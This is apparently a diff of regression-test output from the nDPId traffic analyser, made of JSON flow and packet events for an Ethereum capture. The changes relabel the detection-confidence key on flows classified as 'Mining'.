00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3dHcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4TYQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="} 01013{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} 